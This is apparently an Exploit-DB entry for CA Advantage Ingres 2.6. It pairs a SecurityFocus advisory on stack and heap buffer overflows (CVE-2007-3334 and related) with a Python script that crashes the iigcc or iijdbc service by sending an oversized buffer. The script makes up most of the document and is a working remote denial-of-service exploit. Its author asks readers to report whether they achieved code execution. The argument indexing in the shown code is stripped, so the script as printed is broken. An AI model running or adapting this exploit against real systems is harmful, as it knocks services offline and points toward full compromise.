source: http://www.securityfocus.com/bid/24585/info Ingress Database Server included in CA eTrust Secure Content Manager is prone to multiple remote vulnerabilities, including multiple stack- and heap-based buffer-overflow issues, multiple pointer-overwrite issues, and an arbitrary-file-overwrite issue. Successful exploits will allow attackers to completely compromise affected computers, including executing arbitrary code with SYSTEM-level privileges and truncating the 'alarkp.def' file. # Exploit Title: Computer Associates Advantage Ingres 2.6 Denial of Service Vulnerabilities # Date: 2010-08-14 # Author: fdisk # Version: 2.6 # Tested on: Windows 2003 Server SP1 en # CVE: CVE-2007-3334 - CVE-2007-3336 - CVE-2007-3337 - CVE-2007-3338 # Notes: Fixed in the last version. # please let me know if you are/were able to get code execution <rr dot fdisk at gmail dot com> import socket import sys if len(sys.argv) != 4: print "Usage: ./CAAdvantageDoS.py <Target IP> <Port> <Service>" print "Vulnerable Services: iigcc, iijdbc" sys.exit(1) host = sys.argv port = int(sys.argv) service = sys.argv if service == "iigcc": payload = "\x41" * 2106 elif service == "iijdbc": payload = "\x41" * 1066 else: print "Vulnerable Services: iigcc, iijdbc" sys.exit(1) payload += "\x42" * 4 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((host, port)) print "Sending payload" s.send(payload) data = s.recv(1024) s.close() print 'Received', repr(data) print service + " crashed"
Related ExploitsTrying to match CVEs (1): CVE-2007-3334
Trying to match OSVDBs (1): 37487
Other Possible E-DB Search Terms: Ingress Database Server 2.6, Ingress Database Server